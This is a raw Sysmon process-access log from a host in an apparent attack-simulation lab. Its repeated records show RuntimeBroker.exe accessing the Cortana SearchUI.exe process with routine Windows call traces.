12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.010{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
